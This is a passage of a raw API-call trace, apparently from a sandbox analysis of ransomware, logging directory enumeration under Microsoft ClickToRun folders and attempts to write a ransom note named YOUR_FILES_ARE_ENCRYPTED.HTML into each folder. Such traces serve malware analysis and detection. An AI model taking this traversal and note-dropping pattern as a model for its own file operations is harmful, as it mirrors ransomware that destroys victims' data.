(pszPath="UserManifest.xml.12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B") returned=".12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B" [0169.609] lstrlenW (lpString=".12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B") returned 65 [0169.609] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb278bc0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.609] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 180 [0169.609] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.609] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb278bc0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.609] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0169.609] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 180 [0169.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.610] GetProcessHeap () returned 0x270000 [0169.610] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0169.611] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{1A8308C7-90D1-4200-B16E-646F163A08E8}", cAlternateFileName="{1A830~1")) returned 0 [0169.611] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0169.611] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0169.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.611] GetProcessHeap () returned 0x270000 [0169.612] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0169.612] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{9AC08E99-230B-47E8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 0 [0169.612] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0169.612] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0169.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.612] GetProcessHeap () returned 0x270000 [0169.613] HeapFree (in: hHeap=0x270000, 
dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0169.613] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb29ed20, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.613] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0169.613] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.613] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb29ed20, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.613] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.613] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0169.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all 
users\\microsoft\\clicktorun\\machinedata\\catalog\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.613] GetProcessHeap () returned 0x270000 [0169.614] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.618] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 1 [0169.618] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration") returned 67 [0169.618] GetProcessHeap () returned 0x270000 [0169.619] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.620] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration" [0169.620] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*" [0169.620] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.620] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.621] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ShortcutBackups", cAlternateFileName="SHORTC~1")) returned 1 [0169.621] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups") returned 83 [0169.621] GetProcessHeap () returned 0x270000 [0169.621] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0169.623] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups" [0169.623] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*" [0169.623] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0169.623] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.623] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb29ed20, ftCreationTime.dwHighDateTime=0x1d7fb46, 
ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.623] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0169.623] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.623] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb29ed20, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.623] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0169.623] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0169.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 
returned 0xffffffff [0169.624] GetProcessHeap () returned 0x270000 [0169.624] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0169.624] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb2c4e80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.624] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0169.624] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.624] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb2c4e80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.625] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.625] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0169.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.625] GetProcessHeap () returned 0x270000 [0169.625] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.625] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb2c4e80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.625] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0169.625] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.626] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb2c4e80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.626] FindClose (in: hFindFile=0x42f31c0 | out: 
hFindFile=0x42f31c0) returned 1 [0169.626] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0169.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.626] GetProcessHeap () returned 0x270000 [0169.626] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.626] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb2eafe0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2eafe0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="UserData", cAlternateFileName="")) returned 1 [0169.627] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData") returned 52 [0169.627] GetProcessHeap () returned 0x270000 [0169.627] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.627] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData" [0169.627] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData", lpString2="\\*" 
| out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*" [0169.627] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb2eafe0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2eafe0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.627] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb2eafe0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2eafe0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.627] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb2eafe0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb2eafe0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2eafe0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.627] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 
